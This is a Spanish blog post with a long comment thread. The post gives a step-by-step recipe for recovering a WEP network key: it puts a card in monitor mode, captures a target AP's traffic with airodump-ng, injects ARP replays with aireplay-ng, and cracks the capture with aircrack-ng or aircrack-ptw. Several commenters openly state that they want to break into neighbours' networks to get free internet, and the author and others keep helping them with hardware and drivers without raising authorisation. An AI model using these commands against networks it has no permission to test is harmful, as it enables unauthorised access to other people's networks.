HowTo: Romper Cifrado WEP con Aircrack-ng y Aircrack-ptw
por CrackVanVoy a poner una recetilla para sacar la clave WEP con Aircrack-ng, como apoyo a Vídeo: hackear WEP en 10 minutos y Vídeo: hackear WEP en 10 minutos (II), ya que se basan en Aircrack y no en Aircrack-ng, y de paso añadir a la receta la posibilidad de usar Aircrack-ptw.
Los pasos se pondrán con ath0, wifi0 y ath1 como interfaces (tarjetas Atheros), sustituyendose para cada caso por la que corresponda…
1. Lo primero tener correctamente instalados los drivers para nuestra tarjeta, para poderla poner en modo monitor e inyectar trafico, esto ya depende del chipset que tenga la tarjeta, en mi caso es Atheros y el driver es MadWifi, (Aquí tenéis una buena pagina para ver que chipset usa cada tarjeta, asi como el driver, pudiendo filtrar por fabricante, chipset… Linux wireless LAN support).
2. Una vez configurada la tarjeta y funcionando, habrá que ponerla en modo monitor, normalmente:
iwconfig ath0 mode monitor
en caso de que este método no sirva (con atheros no es valido este metodo):
airmon-ng start wifi0 [canal]
Esto creara una nueva interfaz ath1 que sera la que usemos a partir de ahora (para otros Drivers/Chipsets la que corresponda). Opcionalmente podemos poner un canal.
3. Ver que redes/clientes hay al alcance, para ello usaremos airodump-ng de la siguiente manera:
airodump-ng -w archivocaptura ath1
De esta forma veremos que redes/clientes hay para todos los canales.
4. Fijamos el objetivo, y miramos su bssid o mac y el canal en el que trabaja, para capturar específicamente para esa red:
airodump-ng –channel 9 -w archivocaptura ath1
Si se quiere restringir la captura a una red determinada, porque hay varias redes en el mismo canal, y queremos que la captura sea solo de una de ellas:
airodump-ng –bssid XX:XX:XX:XX:XX:XX –channel N -w archivocaptura ath1
Siendo XX:XX:XX:XX:XX:XX la MAC del AP objetivo y N el canal en el que esta. La captura la haremos sin el –ivs, para que guarde los paquetes enteros, con vistas a poder usar aircrack-ptw que necesita que la captura se haga de esta forma.
5. Una vez que tenemos trabajando airodump-ng en un terminal, y tenemos algun cliente conectado a esa red (se ve en airodump-ng), abrimos otro terminal para la inyección de paquetes con aireplay:
aireplay-ng –arpreplay -b XX:XX:XX:XX:XX:XX - h YY:YY:YY:YY:YY:YY ath1
Siendo XX:XX:XX:XX:XX:XX la MAC del AP objetivo y YY:YY:YY:YY:YY:YY la del cliente conectado a esa red. Ahora deberíamos notar un incremento en la velocidad de captura de datos por parte de airodump-ng, en cuanto aireplay-ng capture y reinyecte paquetes ARP.
6. En cuanto tengamos unos cuantos paquetes capturados (80k-100k segun cada uno…) podemos poner a trabajar a aircrack-ng o usar aircrack-ptw que necesita menos datos capturados para sacar la clave.
aircrack-ng -0 -x -i 1 archivocaptura.cap
-i 1 es para decirle que el índice de clave sera 1 (1-4) que es lo normal, esto lo podemos quitar si queremos. Por defecto busca contraseñas de 128bits, si es de 64 también la sacara pero tardara algo mas). Si se quiere indicar que la clave es de 64bits, podemos poner el parametro -n 64.
Para aircrack-ptw:
aircrack-ptw archivocaptura.cap
Pues ya esta, esta es la receta. Si todo va bien, tendremos la clave, tanto en Hexadecimal como en ASCII.
Aclaracion: las opciones –channel –bssid y –arpreplay van con doble guion delante (por si no se ve bien).
- Leido 52,648 veces
necesito los programas donde puedo conseguirlos y los videos que estan puesto en la web que no se descargan gracias para roper las claves web
Veo que usas Windows, una de dos, o buscas como hacerlo en windows (yo no lo he probado, no lo se, y no me interesa) o lo haces en Linux, con aircrack-ng y/o aircrack-ptw, si no quieres instalar Linux puedes usar una LiveCD que no te instala nada y tendras Linux desde un CD/DVD, puedes probar con BackTrack.
El video lo tienes en otro post pero bueno… Enlace al Video explicativo de como sacar la clave WEP (son como 100mb)
Receta practica para reventar claves WEP con Aircrack-ng y Aircrack-ptw…
Receta paso a paso para sacar la clave WEP de una red wireless, mediante la inyección de trafico con aireplay-ng y la captura con airodump-ng….
para poder usar aircrack-ptw necesitas tener mucho espacio en disco ya que es facil que el archivo llegue a los 400 megas
pero si prefieres usar aircrack-ng con la opcion -ivs en vez de 400 megas crea un archivo con solo lo importante de unos 4 megas
Hola, bastante didactico, enhorabuena.
No se si llegaste a verlo, pero hace no mucho explicaban por ahi como entrar a wireless via DNS, para poder conectarse gratis a redes de hoteles y aereopuertos…
Si haces un tutorial de eso, me tienes como lector diario, seguro.
jsefija: ten en cuenta que necesitaras capturar menos paquetes si vas a usar aircrack-ptw, de todas formas creo que hoy en dia 200-400mb no son un problema, ¿no?, mi ultima captura no llego a 250mb con una clave de 128bits.
Lo de –ivs si lo he indicado, pero se me ha olvidado comentar lo del tamaño del archivo, como muy bien has apuntado, por si alguien anda escaso de espacio.
Gracias, se me había pasado.
YO: pues no, no lo he visto, mirare a ver lo que encuentro por ahí, puede ser muy interesante.
Hola, tengo un portatil HP, he mirado que chip lleva mi tarjeta wifi y no lo encuentro, creo que un tal orinoco… es posible??
Saludos.
HowTo: Romper Cifrado WEP con Aircrack-ng y Aircrack-ptw…
Receta practica de como sacar la clave WEP de una red Wireless usando aircrack-ng y aircrack-ptw en Linux….
Si david, puede ser que sea ese, ya que existe un chipset orinoco, no confundir con las tarjetas de la marca Orinoco…
y alguien si a podido robarse la señal???
funcionara este metodo
Si que funciona isra, el cifrado WEP no es muy seguro que digamos…
, solo hay que aplicarlo bien, y un poco de practica y paciencia 
Podria usar un adaptador USB inalambrico?, y otro marca D-LINK que va conectado a la tarjeta de red?. Gracias.
Lo podrías usar, claro, siempre y cuando este soportado en Linux y los drivers soporten el modo monitor y la inyección de paquetes
OK, ademas por todo lo leido anteriormente, tendria que identificar el chipset de los adaptadores y localizar los drivers en el enlace que incluyes al principio.
Eso es, al final del enlace numero 1 tienes un enlace a una lista muy buena
Creo que he localizado el chipset (para un adaptador D-LINK, DWL-900AP+), pero no tengo ni idea de cual es el driver que tengo que usar cuando me redirecciona a ACX100.
Pero… eso es un AP… ¿no?
podrias comentarme algo mas al respecto?? estoy…perdido…totalmente…
Pues que si es un AP te conectas a el vía cable de red, y a este aparato no se le puede meter el aircrack dentro para lanzarlo desde ahí, con lo que no podrás hacerlo.
Necesitas un adaptador USB Wifi o PCMCIA si es un portatil, o una tarjeta PCI Wifi
¿Sabes como te digo?
Tengo un adaptador USB SENAO INTERNATIONAL LTD. mod NL3054 UB5, pero no veo que tenga drivers para el.
Que opinas?
Pues no se, ¿has probado a usarlo en tu Linux?, ¿a ver si te lo reconoce y como y con que driver?
Porque veo que posteas desde XP, pero estas instrucciones que he puesto en el articulo son para usarlas bajo Linux
OK, lo tenia previsto, usar UBUNTU mediante un CDlive. De momento, para mi, linux al igual que este post, son todo un mundo por descubrir…
He probado a pinchar el adaptador y no hace absolutamente nada.
Definitivamente se me resiste. He consultado la lista en el enlace de mas arriba y parece que el adaptador USB tampoco esta soportado.
ercarvo, puedes bajarte la distribución BackTrack, es especial para Wireless y temas de seguridad, con lo que te trae bastantes drivers y soporte para muchos dispositivos, es una LiveCD, lo mismo tienes suerte y te la soporta, y de paso ves que driver usa
Ok, probaremos por ahi, a ver que tal resulta. Tambien tengo entendido que wifislax es parecido a backtrack??.
Si, es otra distribución, hay muchas jeje, BackTrack es el resultado de la unión de las distribuciones especializadas en seguridad: Auditor y Whax o Whoppix
hola buen aporte ¿y que asen acá tipos de la religión falsa de bill gates?
Algunos están intentando salir de ese infierno, otros simplemente se han equivocado de sitio XD
Si les supone algun problema, pues lo dicen ustedes y listo, no pasa nada. GRACIAS.
Hola ercarvo si quieres aprender bienvenido a la comunidad
“Prefiero mi mente abierta por la curiosidad que cerrada por la convicción”
heyyyy ercarvo, que no iba nada en contra tuyo ehh?, si te has dado cuenta te he contestado a todos tus mensajes gustosamente, es solo que no se si en este o en otros post ha entrado alguien metiéndose conmigo por ponerlo para Linux y no para windows, solo eso.
No tengo ningun problema en que preguntes lo que quieras
OK, crackvan, efectivamente has contestado amablemente a mis cuestiones desde el principio y sin ningun problema. Pero como he sido yo el que ha planteado las ultimas dudas pues… me he sentido aludido directamente, no tenia idea que en otros post estaba la cosa calentita. MIS DISCULPAS A LOS DOS CRACKVAN E IVAN. Mi interes va directamente encaminado al cifrado WEP y a LINUX, sin duda. Seguiremos investigando y preguntando. Ya te adelanto que tengo descargado backtrack y estoy buscandome otro adaptador inhalambrico. Por cierto aprovecho para preguntar si me podeis dar algun modelo de adaptador que se comercialice actualmente y con el que no tenga problema. Gracias y perdon de nuevo.
Sin problema ercarvo, no pasa nada
Te acuerdas del listado del post?, podrías plantearte hacerlo a la inversa, mirar entre los dispositivos usb alguno que puedas localizar y que lleve atheros, prism2 o algún otro chipset soportado completamente, ¿que te parece?, si veo por ahi alguno del que hablen bien y digan que funciona perfectamente para esto, te lo comento.
El que sortee no hace mucho en el blog estaba soportado en Linux, probé a ponerlo en modo monitor y capturar, pero no llegue a probar a inyectar paquetes y sacar alguna clave, no me dio tiempo.
OK CrackVan, voy a probar asi, De cualquier forma, ¿tiene que ser necesariamente USB?; ¿podria ser PCI?.Gracias
He encontrado este modelo D-LINK DWL-G510 (es PCI) que veo segun el listado que soporta los driver. Tambien he encontrado este otro modelo pero no lo veo tan claro NETGEAR WG311FS. ¿Que me puedes comentar al respecto?; ¿me decido por la D-LINK?.
Por supuesto que tambien puedes usar uno PCI, eso ya como tu quieras.
Veamos, la D-LINK DWL-510 lleva chipset Atheros, pero la DWL-510 rev.C1 y rev.C2 llevan Ralink, en principio estan las dos soportadas y no tendrias que tener problemas, pero si quieres el Atheros ten en cuenta eso a la hora de comprarla.
Tambien tienes la DWL-520 pero sin el +, que tambien lleva Atheros.
La Netgear no le veo en el listado y buscando tampoco lo encuentro ahora mismo
Hola chicos efectivamente la d-linnk dwl-520 funciona sin problemas en Linux ,pero ojo los drivers que están en la pagina de del fabricante no sirven, el make envía errores en a compilación ,pero afortunadamente existe una live con los drives pre compilados me refiero a Mepis la gracia de esta distro es que la puedes ejecutar desde el cd sin tocar para nada el disco duro y si te gusta la puedes instalar, dejo el enlace a los mirrors de descarga
http://www.mepis.org/mirrors
Saludos y suerte
Si, en caso de que no quiera instalar Linux en el HD de momento, tiene muchas opciones, creo que ya se ha descargado la LiveCD de BackTrack, y como comentas también puede probar Mepis, y muchas mas…
Y en caso de tener ya Linux instalado, seria hacer una instalacion de los drivers madwifi
[...] y dependiendo del chipset utilizado tendremos o no opciones de inyección de paquetes para un ataque al cifrado WEP o WPA, ponerlo en modo AP, [...]
o.k.CrackVan, ya habia comenzado a ver este post nuevo que has incluido, gracias de nuevo.
ivan, me he descargado una distribuicion de Mepis pero no me sirve, es para amd64, intentare descargar otra.
De nada, espero que te sirva
hola, pues estube buscando en la pag de linux y no esta la targeta k tengo k es esta Intel(R) PRO/Wireless 3945ABG Network Connection pues estoy bastante urgio ya k estpy casi un año sin internet en casa, pues si ahi alguna forma me gustaria leerla
Grosa la ayuda wey.. me ayudo a arientarme bastante. En especial con la puta atheros q tengo en la notebook. Un abrazo
ah y no se rian q uso Win :D.. saludos
Me alegro de que te sirva de ayuda Jony, respecto a lo de que usas Güindos… bueno, nadie es perfecto
Suerte amigos ,con el permiso del amdmin ofrezco mi ayuda a quien la necesite , los usuarios del gestor promiscuo de memoria y archivos .exe ,siéntanse bienvenidos
Buenos pues le cuento que trate de hacer esto lamentablemente no me funciono no envia paquetes y me da este error
The interface MAC (00:13:02:D6:20:44) doesn’t match the specified MAC (-h).
ifconfig eth1 hw ether 00:11:F5:A1:64:BF
Saving ARP requests in replay_arp-1025-184555.cap
You should also start airodump-ng to capture replies.
Read 23 packets (got 0 ARP requests), sent 0 packets…(0 pps)
bueno pues despues de eso escribo
mrodas@MrodasLnx:~$ sudo aircrack-ng -0 -x -i 1 archivocaptura.cap
Opening archivocaptura.cap
open failed: No such file or directory
y la verdad ya no se que hacer..!!
alguien me puede ayudar.!!!
gracias.!!
saludos
Funciona a la perfección, yo usaba aircrack y era algo mas largo el tema.
un saludo!! La cosa es que deseaba crackear la WEP del vecino y no se si se puede.. dispongo de un USB Speedtouch Wireless 121g, no se si estoy perdiendo el tiempo… porque le he instalado varios programas, pero nada…
Me parece una suma tonteria publicar este “Howto” que solo hace que provocar erecciones entre los 4 script-kiddies de turno, los cuales jamas se molestaran en realmente aprender por que WEP es vulnerable y que alternativas o contramedidas pueden adoptarse.
Si quisiera publicar tonterías hubiese publicado como hacerlo con Güindos y cuatro programitas… pero no, he publicado las lineas o el howto de como yo lo he hecho en algún momento con Linux, hay mas formas y tipos de ataque, de los cuales también he recogido alguno en el blog, ya sea en texto o con un vídeo.
Y que cojones, esto es mi blog y publico lo que me da la gana, si no te sirve o no te gusta esta claro que no lo he escrito para ti, y no porque me lo digas tu voy a dejar de publicar lo que me de la gana, incluso tonterias.
Asi se habla fuerte claro espero poder disfrutar de otros howtos tan interesantes como este desde Chile Sudamerica un salu2
Gracias ivan, no te preocupes que en cuanto tenga algo que escribir lo escribiré, un howto o lo que surja
Hola… soy nueva en todo esto… me acaban de regalar una lap q detecta las conexiones de mis vecinos todas las alcanzables… yo no tengo infinitum, sino conexion de cable telefonico (no se rian)
bueno el caso es que SI… QUIERO HACKEAR LA CONEXION DE MIS VECINOS, pero nomas no entiendo ni ma…iz. pueden agregar un archivo pdf… que explique como hackear desde windows vista, ya vi el video de airodump,aireplay,air no se que… pero es de linux…y claro q es mas facil hackear q pagar infinitum… jejje.. salu2 a to2
Lo siento, pero no uso Vista, no te podre ayudar en eso
De todas formas hay cds de Linux que puedes usar si necesidad de instalarlo en el disco duro de tu ordenador.
Buenas, lo he intentado pero me encuentro que cuando quiero fijar la tarjeta para que escuche en un solo canal, haciendo airomon-ng start eth1 1, pues me dice que na de na.
Uso el ipw2200.
No sé si tengo q parchearla o que? aunque el airodump-ng y el kismet me funcionan osea que en principio la tarjeta se pone en modo monitor, no?
Alguna sugerencia?
Un saludo.
Prueba a ponerla en modo monitor con iwconfig eth1 mode monitor o iwconfig eth1 mode monitor channel 1
hola quisiera saber si es posible desde windows vista tengo una compac v 3000 les agradeceria su ayuda
Hola a tod@s,para empezar no tengo muchas nociones de informática pero soy bastante tenaz.Quisiera saber si con un receptor wifi usb marca Zydas podría averiguar la clave wep de un vecino cuya señal me entra aproximadamente al 30%.Mi pc es un xp profesional.Agradecería mucho una respuesta y gracias por vuestra paciencia de antemano
Lo siento mirlin0 solo he probado estas cosas en Linux
, pero al menos en Linux si hay posibilidad de usar los dispositivos Zydas para esas cosas
ola tengo un problemita me pasa lo mismo q uno de los personajes q postularon en este foro, tengo una laptop con wind vista descargue el programa y no me da la clave correcta ósea no lo se manejar bien seguí las instrucciones de un vídeo q hay en youtube pero no me servio si alguien me podría explicar bien esto estaría muy agradesido. Mi corrió es juanfe4546@hotmail.com pero sería bueno q me respondieran en el foro ya q no soy el único con este problemita. Muchas gracias por la atención prestada.
Aclaraciones el programa q descargue es el aircrack-kg no he probado el ptw ya q no lo he podido descargar. El vídeo q vi y seguí las instrucciones está en youtube coloque TUTORIAL aircrack posulsdo por achraf, disculpen q no les mande el link pero no puedo seguí todos los pasos q dan ahí pero no me funcionó
Buenos dias,
hay manera de utilisar estos programas o crackear una red wifi con un portatil y vista instalado?
Muchas gracias
[...] Ya os hablé en su día de las novedades y mejoras que aportaba Aircrack-ptw, incluso una receta completa para romper el cifrado WEP tanto Aircrack-ng como Aircrack-ptw. [...]
Hola de nuevo. despues de algun tiempo volvemos “a la carga”. Ya estoy trabajando con Linux habitualmente. Ahora estoy buscando un adaptador, que podeis decirme de este? “USB Wireless 54Mbps 802.11g Chipset Zydas + Antena RP-SMA (Modo monitor solo en Linux)”Gracias.
Aquí tenéis el enlace con las características del susodicho adaptador
Hola ercarvo probé una tarjeta con Zydas hace tiempo, sin problemas con los drivers, y el modo monitor tampoco, pero no la llegué a probar para inyectar trafico
Gracias CrackVan y perdon por mi insistencia. Que opinion te merece esta otra:
Adaptador USB 802.11g conector RP-SMA + Antena 4dbi (Chipset Ralink)
Uffff, vaya tela, no es el enlace que queria mostrar, perdon…:
//www.comprawifi.com/usb/aircrack/adaptador-usb-802-11g-conector-rp-sma-antena-4dbi-chipset-ralink-/prod_855.html
Hola ercarvo puedes consultar los chipset, compatibilidad con aircrack-ng, etc en los enlaces que recopilé en este post
Y aquí te pongo un enlace directo a los chipset ralink, donde puedes ver que la ultima tarjeta no esta soportada en windows por aircrack y si en linux, míralo por el modelo de la tarjeta
hola comparto la conexion con el vecino altruista que todos tenemos cerca, pero me gustaria probar de petar las conexiones que tienen clave wep, con linux o windows , tengo el adaptador usb de jazztell con chip zydas, he leido que solo se puede poner en modo monitor en linux , pero no se que drivers son los que he de cojer ni que programas bajar , tengo un live cd ubuntu
gracias a todos
Prueba con el LiveCD Wifi-Slax y el BackTrack, son específicos para estos temas WiFi…
tanto losser de windows tratando de ser grande un consejo en forma de amigo
siquieres hacer un trabajo debes hacerlo con las herramientas adecuadas de windows nunca conseguiras nada
para hacer cosas de grande tienes que ocupar sistemas de grandes
Fucking wintendo
compadre tengo un adaptador usb d-link dwa-140 wireles n con chipset ralink , kiero cachar si backtrack 2 agarra automaticamente los drivers en modo normal del adaptador,o sea no en modo monitor???
Bueno el tutorial. Gracias.
hola yo no puedo inyectar datos en la red tengo una tarjeta Intel® PRO/Wireless 2200BG los lee pero no los envia bueno espero me puedan ayudar, me pueden agregar al messenger gracias bye